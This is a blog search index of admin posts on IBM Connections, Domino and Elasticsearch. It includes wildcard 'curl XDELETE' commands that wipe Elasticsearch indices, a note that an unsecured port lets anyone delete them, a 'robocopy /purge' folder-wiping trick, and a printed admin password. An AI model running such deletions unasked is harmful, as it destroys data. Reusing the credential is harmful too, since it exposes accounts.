value=\u0026#34;float\u0026#34; /\u0026gt; \u0026lt;/allowstyling\u0026gt; Without the cssSchema (tried css3, 3.0 and some more) I get no errors in the log files, but css is still not saved. I hope we can find a way to allow CSS allowlist fine tuning, but until we can do this, I will switch back to old blacklists (in environments which are not public available).\n","excerpt":"\u003cp\u003eSo up to IBM Connections 6.0 everything was allowed until it was not\nexcluded in one of the blocklist files. This files are stored within the\n\u003ccode\u003eDeployment Manager profile/config/cells/\u0026lt;cellname\u0026gt;/LotusConnections-config/extern\u003c/code\u003e.\nNow with Connections 6.0CR1 everything is forbidden, until it is enabled in the allowlist.\nThis concept is rolled out for widgets (homepage and communities) and\nactive content. Active content means HTML content too. So everything you\nor your users add to Connections (blog-posts, wiki pages) gets filtered\nduring the save procedure. This removes all HTML tags and attributes\nwhich are not explicitly allowed!\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/ibm-connections-6-0cr1-allowlisting-css-and-wiki-toc/","title":"IBM Connections 6.0CR1 Allowlisting, CSS and Wiki TOC"},{"body":"IBM Connect Best and Worst Practices for Deploying IBM Connections IBM Connections Adminblast Engage IBM Connections Adminblast Adesso CCTY (Connect Comes to You) Docker in der Praxis – Grundlage für die künftige Infrastruktur der IBM Kollaborationsprodukte IBM Connections 6.0 und IBM Connections pink Social Connections 12 Automate IBM Connections Installations and more ","excerpt":"\u003ch2 id=\"ibm-connect\"\u003eIBM Connect \u003ca href=\"#ibm-connect\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-02-23-bestandworstpracticesfordeployingibmconnections.pdf\" target=\"_blank\"\u003eBest and Worst Practices for Deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-02-23-ibmconnectionsadminblast.pdf\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"engage\"\u003eEngage \u003ca href=\"#engage\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-ibm-connections-adminblast.pdf\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"adesso-ccty-connect-comes-to-you\"\u003eAdesso CCTY (Connect Comes to You) \u003ca href=\"#adesso-ccty-connect-comes-to-you\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-docker1x1withdominoexample.pdf\" target=\"_blank\"\u003eDocker in der Praxis – Grundlage für die künftige Infrastruktur der IBM Kollaborationsprodukte \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-ibmconnections6.pdf\" target=\"_blank\"\u003eIBM Connections 6.0 und IBM Connections pink \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"social-connections-12\"\u003eSocial Connections 12 \u003ca href=\"#social-connections-12\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-10-16-ansible4connections.pdf\" target=\"_blank\"\u003eAutomate IBM Connections Installations and more \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2017/","title":"Talks 2017"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-domino/","title":"HCL Domino"},{"body":"During the week we integrated IBM Connections and IBM Docs in our test environment and everything worked fine. Then we moved the configuration to production and most of the stuff was working, like showing Business cards, profile pictures and Connections files to add into mails. Docs Viewer and uploading files from a mail to Connections generated an error: “because of an internal server error”\nI digged into it with Burpsuite and Fiddler4 , in the meantime a customer called me and described the same symptoms. Within the traces I found that the systems which didn’t upload the files had following header set:\nX-IBM-INOTES-NONCE: \u0026lt;none\u0026gt; and the working one had:\nX-IBM-INOTES-NONCE: 2640941AE5454F5853E6732F79E7D2F5 So i searched a little bit on X-IBM-INOTES-NONCE and found that is introduced in Notes/Domino 8.5.2 and shall prevent XSS.\nYou can disable this with iNotes_WA_Security_NonceCheck =0 and this is mentioned in a technote , that sometimes proxies or F5 needs this setting. First we tried that on our testsystems and we seemed to be right, the upload was broken too.\nWe removed the notes.ini entry (or set it to 1) and after a http restart the file upload from VOP and the IBM Viewer worked!\nThanks to Thomas who digged into this with me today.\nUpdate 2017-11-20 IBM released a technote on this. ","excerpt":"\u003cp\u003eDuring the week we integrated IBM Connections and IBM Docs in our test\nenvironment and everything worked fine. Then we moved the configuration\nto production and most of the stuff was working, like showing Business\ncards, profile pictures and Connections files to add into mails. Docs\nViewer and uploading files from a mail to Connections generated an\nerror: “because of an internal server error”\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-11-02-ibm-verse-on-premises-integration-with-connections-and-docs-issue-with-inotes_wa_security_noncecheck/","title":"IBM Verse on Premises Integration with Connections and Docs issue with iNotes\\_WA\\_Security\\_NonceCheck"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/social-connections/","title":"Social Connections"},{"body":"This time Social Connections is hosted in Vienna. The austrian capital is a great place to meet new and old friends. I love the city and the awesome dialect, to listen and practise a little bit, start with the lovely video about the only word you really need to survive in Vienna.\nThe next two days are packed with informations about IBM Connections and I hope to get in touch with the developer team of Pink to see the next planned features. The agenda promises a good mix for all people interested in IBM Connections, developers, administrators and adoption experts can attend and discuss with speakers, IBM developers, product managers and IBM Business partners.\nMy sessions I will do one session with my colleague and mate Nico Meisenzahl about “IBM Connections Admin Blast”. The updated session was born for IBM Connect in February this year and will guide you through around 55 different tips and tasks you should be aware during deploying and administrating IBM Connections and the available addons like Forms/Surveys,Docs and CCM. The session takes place on monday 11:20-12:20 in Breakout 2 (lunch will start around 12:30, so we will take the chance and show all slides without jumping over the last ones and let you have food in time).\nMy other session is a little bit shorter and is completly new. “Automate IBM Connections deployments” on tuesday 9:40-10:10 in Breakout 1. Klaus Bild an I showed some scripts to do the same during Social Connections 7 in Stockholm, but for me these were complicated and updating requirements and new packages were a lot of work. The last months I worked with Ansible , which is a perfect match to do automated installations and configurations. Ansible needs just a ssh connection to the servers you want to configure, no special software clients are needed. Agentless on Linux and with the option to do the same with remote powershell on Microsoft Windows.\nAnsible All important tasks are already built in and so you can install software through the tools of the used Linux (apt, dnf, yum…), change security settings, edit ulimits or service configurtions. Installing all Connections prerequisists (Installation Manager, Websphere Application Server, DB2, IBM Httpserver, TDI and all needed os packages) need about 20 minutes on 4 minimal installed Centos VMs on my Notebook. So you can directly start creating databases, update peopledb and finish the last tasks on Websphere.\nI think adding more scripts does only need a lot of time during scripting and will need a lot of customization from environment to environment.\nWorking with Ansible is fun and not really complicated. Ansible has extensions for container management and the Orientme installer is based on it too. So every admin and developer should have a look at it.\n","excerpt":"\u003cp\u003eThis time \u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is\nhosted in Vienna. The austrian capital is a great place to meet new and\nold friends. I love the city and the awesome dialect, to listen and\npractise a little bit, start with the\n\u003ca href=\"https://youtu.be/iuXR53ex4iI\" target=\"_blank\"\u003elovely video \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n about the only word you\nreally need to survive in Vienna.\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-10-15-social-connections-12-in-vienna/","title":"Social Connections 12 in Vienna"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vienna/","title":"Vienna"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/elk/","title":"ELK"},{"body":"With IBM Connections 6 you can deploy the additional component Orient Me , which provides the first microservices which will build the new IBM Connections pink. Orient Me is installed on top of IBM Spectrum Conductor for Containers (CFC) a new product to help with clustering and orchestrating of the Docker containers.\nKlaus Bild showed in a blog post some weeks ago how to add a container with Kibana to use the deployed Elasticsearch for visualizing the environment.\nI found two issues with the deployed Elasticsearch container, but let me explain from the beginning.\nOn Monday I checked my demo server and the disk was full, so I searched a little bit and found that Elasticsearch is using around 50GB of disk space for the indices. On my server the data path for Elasticsearch is /var/lib/elasticsearch/data. With du -hs /var/lib/* you can check the used space.\nYou will see something like this and I would recommend to create a seperate mount point for /var/lib or two on /var/lib/docker and /var/lib/elasticsearch for your CFC/Orient Me server:\ndu -hs /var/lib/* ... 15G /var/lib/docker 0 /var/lib/docker.20170425072316 6,8G /var/lib/elasticsearch 451M /var/lib/etcd ... So I searched how to show and delete Elasticsearch indices .\nOn your CFC host run:\ncurl localhost:9200/_aliases or\n[root@cfc ~]# curl http://localhost:9200/_aliases?pretty=1 { \u0026#34;logstash-2017.06.01\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;logstash-2017.05.30\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;logstash-2017.05.31\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;.kibana\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;heapster-2017.06.01\u0026#34; : { \u0026#34;aliases\u0026#34; : { \u0026#34;heapster-cpu-2017.06.01\u0026#34; : { }, \u0026#34;heapster-filesystem-2017.06.01\u0026#34; : { }, \u0026#34;heapster-general-2017.06.01\u0026#34; : { }, \u0026#34;heapster-memory-2017.06.01\u0026#34; : { }, \u0026#34;heapster-network-2017.06.01\u0026#34; : { } } } } On my first try, the list was “a little bit” longer. So it is a test server, so I just deleted the indices with:\ncurl XDELETE http://localhost:9200/logstash-* curl XDELETE http://localhost:9200/heapster-* For this post, I checked this commands from my local machine and curl XDELETE …​ with IP or hostname are working too! Elasticsearch provides no real security for the index handling, so best practice is to put a Nginx server in front and only allow GET and POST on the URL . So in a production environment, you should think about securing the port 9200 (Nginx, iptables), or anybody could delete the indices. Only logs and performance data, but I don’t want to allow this.\nNow the server was running again and I digged a little bit deeper. So I found that there is a container indices-cleaner running on the server:\n[root@cfc ~]# docker ps | grep clean 6c1a52fe0e0e ibmcom/indices-cleaner:0.1 \u0026#34;cron \u0026amp;\u0026amp; tail -f /...\u0026#34; 51 minutes ago Up 51 minutes k8s_indices-cleaner.a3303a57_k8s-elasticsearch-10.10.10.215_kube-system_62f659ecf9bd14948b6b4ddcf96fb5a3_0b3aeb84 So I checked this container:\ndocker logs 6c1a52fe0e0e shows nothing. Normally it should show us the curator log. The container command is not selected in the best way.\ncron \u0026amp;\u0026amp; tail -f /var/log/curator-cron.log shall show the log file of curator (a tool to delete Elasticsearch indices), but with \u0026amp;\u0026amp; it only starts tail when cron is ended with status true. So that’s the reason that docker logs shows nothing.\nI started a bash in the container with docker exec -it 6c1a52fe0e0e bash and checked the settings there.\ncat /etc/cron.d/curator-cron 59 23 * * * root /bin/bash /clean-indices.sh # An empty line is required at the end of this file for a valid cron file. There is a cronjob which runs each day at 23:59. The started script runs:\n/usr/local/bin/curator --config /etc/curator.yml /action.yml Within the /action.yml the config shows that logstash-* should be deleted after 5 days and heapster-* after 1 day.\nI checked /var/log/curator-cron.log, but it was empty! So the cronjob never ran. To test if the script works as expected, I just started /clean-indices.sh and the log file shows:\ncat /var/log/curator-cron.log 2017-05-31 08:17:01,654 INFO Preparing Action ID: 1, \u0026#34;delete_indices\u0026#34; 2017-05-31 08:17:01,663 INFO Trying Action ID: 1, \u0026#34;delete_indices\u0026#34;: Delete logstash- prefixed indices. Ignore the error if the filter does not result in an actionable list of indices (ignore_empty_list) and exit cleanly. 2017-05-31 08:17:01,797 INFO Deleting selected indices: [u\u0026#39;logstash-2017.05.08\u0026#39;, u\u0026#39;logstash-2017.05.09\u0026#39;, u\u0026#39;logstash-2017.05.03\u0026#39;, u\u0026#39;logstash-2017.04.28\u0026#39;, u\u0026#39;logstash-2017.04.27\u0026#39;, u\u0026#39;logstash-2017.04.26\u0026#39;, u\u0026#39;logstash-2017.05.18\u0026#39;, u\u0026#39;logstash-2017.05.15\u0026#39;, u\u0026#39;logstash-2017.05.12\u0026#39;, u\u0026#39;logstash-2017.05.11\u0026#39;] 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.08 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.09 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.03 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.04.28 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.04.27 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.04.26 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.18 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.15 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.12 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.11 2017-05-31 08:17:02,130 INFO Action ID: 1, \u0026#34;delete_indices\u0026#34; completed. 2017-05-31 08:17:02,130 INFO Preparing Action ID: 2, \u0026#34;delete_indices\u0026#34; 2017-05-31 08:17:02,133 INFO Trying Action ID: 2, \u0026#34;delete_indices\u0026#34;: Delete heapster prefixed indices. Ignore the error if the filter does not result in an actionable list of indices (ignore_empty_list) and exit cleanly. 2017-05-31 08:17:02,161 INFO Deleting selected indices: [u\u0026#39;heapster-2017.04.26\u0026#39;, u\u0026#39;heapster-2017.04.27\u0026#39;, u\u0026#39;heapster-2017.04.28\u0026#39;, u\u0026#39;heapster-2017.05.03\u0026#39;, u\u0026#39;heapster-2017.05.15\u0026#39;, u\u0026#39;heapster-2017.05.12\u0026#39;, u\u0026#39;heapster-2017.05.11\u0026#39;, u\u0026#39;heapster-2017.05.09\u0026#39;, u\u0026#39;heapster-2017.05.08\u0026#39;]2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.04.26 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.04.27 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.04.28 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.03 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.15 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.12 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.11 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.09 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.08 2017-05-31 08:17:02,366 INFO Action ID: 2, \u0026#34;delete_indices\u0026#34; completed. 2017-05-31 08:17:02,367 INFO Job completed. I checked the log file daily after the research and after running the task manually the cron job is working as expected and curator does it’s job. No full disk since last week.\nCFC uses kubernetes and so stopping the clean-indices container creates a new one immediately! All changes disappear then and the cronjob stops working. I don’t want to wait until IBM provides a container update, so I searched a way to run the curator even with a new container on a regular basis.\nI created a script:\n#!/bin/bash id=`docker ps | grep indices-cleaner | awk \u0026#39;{print $1}\u0026#39;` docker exec -t $id /clean-indices.sh docker exec -t $id tail /var/log/curator-cron.log and added it to my crontab on the CFC server.\ncrontab -e 59 23 * * * script \u0026gt;\u0026gt; /var/log/curator.log When you use Kibana to analyse the logs, you maybe want to have more indices available. docker inspect containerid shows us:\n\u0026#34;Mounts\u0026#34;: [ { \u0026#34;Type\u0026#34;: \u0026#34;bind\u0026#34;, \u0026#34;Source\u0026#34;: \u0026#34;/etc/cfc/conf/curator-action.yml\u0026#34;, \u0026#34;Destination\u0026#34;: \u0026#34;/action.yml\u0026#34;, \u0026#34;Mode\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;RW\u0026#34;: true, \u0026#34;Propagation\u0026#34;: \u0026#34;\u0026#34; }, So you can edit the file /etc/cfc/conf/curator-action.yml on the CFC host instead of the container file and your changes will be persistent.\n","excerpt":"\u003cp\u003eWith \u003ca href=\"http://www-03.ibm.com/software/products/en/conn\" target=\"_blank\"\u003eIBM Connections 6 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nyou can deploy the\n\u003ca href=\"https://www.ibm.com/blogs/ibm-social-software/2017/03/28/ibm-connections-6-0-officially-announced/\" target=\"_blank\"\u003eadditional\ncomponent Orient Me \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which provides the first microservices which will\nbuild the new IBM Connections pink. Orient Me is installed on top of\n\u003ca href=\"https://www.ibm.com/developerworks/community/groups/service/html/communityoverview?communityUuid=fe25b4ef-ea6a-4d86-a629-6f87ccf4649e\" target=\"_blank\"\u003eIBM\nSpectrum Conductor for Containers \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (CFC) a new product to help with\nclustering and orchestrating of the Docker containers.\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-06-01-orient-me-elasticsearch-and-disk-space/","title":"Orient Me, Elasticsearch and Disk space"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cli/","title":"CLI"},{"body":"Since some versions of IBM Connections, it is mandatory to delete temp and wstemp of your Connections node after deployment or updates, or you end up with an old layout/design of Connections GUI.\nOn a Windows Server System this can be a pain, because within temp/wstemp WebSphere Application Server creates a folder structure with nodename / application server name and so on. In must cases the delete ends with the message “path too long”.\nSo you can start and rename the folders and try to delete over and over again. A time consuming activity and you need to do several times during an update.\nThere are several tips around, but most of them need an extra tool installed. I searched for a solution for this for a long time, but never blogged about the way I normally use to avoid this. I remembered during a skype discussion with other Connections guys some days ago, so here is the easiest and fasted way to get rid of long paths:\nPath too long? Use Robocopy (thanks Bert van Langen)\nRobocopy is a great tool and it is installed by default since Windows Server 2008, I use it during migrations to move the IBM Connections shared data to an other place, but it’s easy to create an empty folder and move it to the temp folder of the WebSphere Application server node.\nHere as an example:\nmkdir d:\\empty robocopy d:\\empty D:\\IBM\\WebSphere\\AppServer\\profiles\\AppSrv01\\temp /purge But be careful, robocopy is not using the trash, so when you type the wrong path, or forget the , you end up with searching the backup tapes.\n","excerpt":"\u003cp\u003eSince some versions of IBM Connections, it is mandatory to delete temp\nand wstemp of your Connections node after deployment or updates, or you\nend up with an old layout/design of Connections GUI.\u003c/p\u003e\n\u003cp\u003eOn a Windows Server System this can be a pain, because within\ntemp/wstemp WebSphere Application Server creates a folder structure with\nnodename / application server name and so on. In must cases the delete\nends with the message “path too long”.\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-04-10-deleting-temp-and-wstemp-on-microsoft-windows-server/","title":"Deleting temp and wstemp on Microsoft Windows Server"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tools-i-use/","title":"Tools I Use"},{"body":"This year I attended IBM Connect in San Francisco. In my eyes it was a great event and I enjoyed it very much.\nSome announcements are very important for the future and evolution of the IBM portfolio:\n* IBM Connections Pink – Jason Gary and the IBM Development team showed the future of IBM Connections. The basis will be Docker and a lot of other Opensource products. I see forward to work with a complete new stack and be very curious on deployment, migration and scaling. It is a complete rewrite and will not longer need DB2 or WebSphere. A good summarize was written by Glenn Kline. * panagenda ApplicationInsight – all IBM Domino customers with valid maintenance will get ApplicationInsights to analyze the code and usage of their Domino databases * IBM Domino will be updated through feature packs, we will get Java 8 and other long awaited functionality * IBM announced a new lifetime IBM Champion: Julian Robichaux , big congrats to him and well deserved\nJust a few session slides are available through the official conference page (we provided them, but they are still not available), so we uploaded ours to slideshare:\nBest and Worst Practices for Deploying IBM Connections IBM Connections Adminblast All other session slides of my panagenda colleagues can be found in the panagenda slideshare account .\nUpdate During the 11 hour flight to San Francisco I used the time to update the XPages and Generic HTML Widgets (OpenNTF) for IBM Connections 5.5 CR2. Frank van der Linden uploaded the changes today .\n","excerpt":"\u003cp\u003eThis year I attended IBM Connect in San Francisco. In my eyes it was a\ngreat event and I enjoyed it very much.\u003c/p\u003e\n\u003cp\u003eSome announcements are very important for the future and evolution of\nthe IBM portfolio:\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-03-02-ibm-connect-2017-slides-news-and-so/","title":"IBM Connect 2017 – slides, news and so"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/san-francisco/","title":"San Francisco"},{"body":"Sutol Best and Worst practices deploying IBM Connections IBM Connect 2016 Best and Worst Practices Deploying IBM Connections 2016 TDI Solutions Best Practices with IBM Connections Deployments ","excerpt":"\u003ch2 id=\"sutol\"\u003eSutol \u003ca href=\"#sutol\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/sutol-ibmcnxbestpractises.pdf\" target=\"_blank\"\u003eBest and Worst practices deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"ibm-connect-2016\"\u003eIBM Connect 2016 \u003ca href=\"#ibm-connect-2016\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2016-02-01-bestandworstpractices-final.pdf\" target=\"_blank\"\u003eBest and Worst Practices Deploying IBM Connections 2016 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2016-02-02-tdibestpractises-final.pdf\" target=\"_blank\"\u003eTDI Solutions Best Practices with IBM Connections Deployments \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2016/","title":"Talks 2016"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/domino/","title":"Domino"},{"body":"Last week I had an issue that some Domino Server didn’t provide SSO through SPNEGO any longer (environment worked for over 2 years now). This environment uses the customized domcfg.nsf template of Andreas Artner , maybe it’s related, but I don’t think so, on Windows 7 with latest Internet Explorer 11 and Domino Servers 9.0.1 with latest fix pack.\nSo what happened? The Domino servers are placed in the “Local Intranet Zone” of IE through Group Policy from beginning. The Windows administrators started to enable “Enterprise Mode” for better handling of compatibility mode and one of the steps is to deactivate the “Display intranet sites in compatibility View” option.\nAfter this, all sites which are not explicitly configured in “Enterprise Mode” are loading in “Edge Mode” and not longer in quirks mode.\nNearly everything worked fine, XPages load every HTML5 Element, the sites seem to deliver content faster and so on.\nBUT: The configured SPNEGO authentication does not load any longer. The domcfg.nsf loads directly the fallback login form. I analyzed with Fiddler 4 , but nothing suspicious was in the trace. So we configured one Domino Url to load in Quirks Mode (IE Level 5) and Desktop SSO worked immediately. So we played with the different levels and it showed that only the “Edge Mode” in IE11 made problems, when we went a step back and used the IE 10 compatibility mode everything worked: XPages, HTML5 and Desktop Single Sign-On.\nI hope this saves you some time during troubleshooting, I think the Enterprise Mode is a trending thing and removing the Quirks Mode is an important step.\n","excerpt":"\u003cp\u003eLast week I had an issue that some Domino Server didn’t provide SSO\nthrough SPNEGO any longer (environment worked for over 2 years now).\nThis environment uses the\n\u003ca href=\"https://www.openntf.org/main.nsf/project.xsp?r=project/Custom%20Login%20Page\" target=\"_blank\"\u003ecustomized\ndomcfg.nsf template \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n of \u003ca href=\"http://tdiblog.anderls.com/\" target=\"_blank\"\u003eAndreas Artner \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nmaybe it’s related, but I don’t think so, on Windows 7 with latest\nInternet Explorer 11 and Domino Servers 9.0.1 with latest fix pack.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-08-21-internet-explorer-edge-mode-without-spnego-sso/","title":"Internet Explorer – Edge Mode without SPNEGO SSO"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sso/","title":"SSO"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/install/","title":"Install"},{"body":"This week I installed IBM Connections 5.5CR1 on a Windows Server. I used WebSphere Application Server 8.5.5.9 and everything ran pretty smooth, but the Connections install itself ended in an error after all applications were successfully installed.\nThe popup showed a regexp error and a long string. The installer ran through the night, so I couldn’t remember this string and started the install again. The Same message box appears after everything was successfully installed (checked through ISC, after the error everything was uninstalled by the Installation Manager) and even the install.log showed nothing special.\nThis time, I remembered the string, it was the password of my WebSphere Administration user! The password looked like this:\n960n4gv343te6f(\nAfter removing the bracket and replaced it with another special character everything was installed without error. So be careful with special characters and IBM Installations.\nI never had an issue with special characters, but I know that the Sametime documentation mentions that space, @ and ! can be a problem.\n","excerpt":"\u003cp\u003eThis week I installed IBM Connections 5.5CR1 on a Windows Server. I used\nWebSphere Application Server 8.5.5.9 and everything ran pretty smooth,\nbut the Connections install itself ended in an error after all\napplications were successfully installed.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-08-20-regexp-error-during-connections-install/","title":"Regexp error during Connections install"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/windows-server/","title":"Windows Server"},{"body":"","excerpt":"","ref":"https://stoeps.de/search-index/","title":""},{"body":"Last week I wrote a post about Using Docker and ELK to Analyze WebSphere Application Server SystemOut.log , but i wasn’t happy with my date filter and how the websphere response code is analyzed. The main problem was, that the WAS response code is not always on the beginning of a log message, or do not end with “:” all the time.\nI replaced the used filter (formerly 4 lines with match) with following code:\ngrok { # was_shortname need to be regex, because numbers and $ can be in the word match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:wastimestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} (?\u0026lt;was_shortname\u0026gt;\\b[A-Za-z0-9\\$]{2,}\\b) %{SPACE}%{WORD:was_loglevel}%{SPACE} %{GREEDYDATA:message}\u0026#34;] overwrite =\u0026gt; [ \u0026#34;message\u0026#34; ] #tag_on_failure =\u0026gt; [ ] } grok { # Extract the WebSphere Response Code match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;(?\u0026lt;was_responsecode\u0026gt;[A-Z0-9]{9,10})[:,\\s\\s]\u0026#34;] tag_on_failure =\u0026gt; [ ] } You see i replaced the different patterns with a regular expression to find the response code. tag_on_failure ⇒ [] prevents generating an error, when no resonse code was logged.\nNow i’m able to use was_responsecode to generate a graph with the different response codes over a timeline, so i’m able to see when errors appear more often.\nExample I created 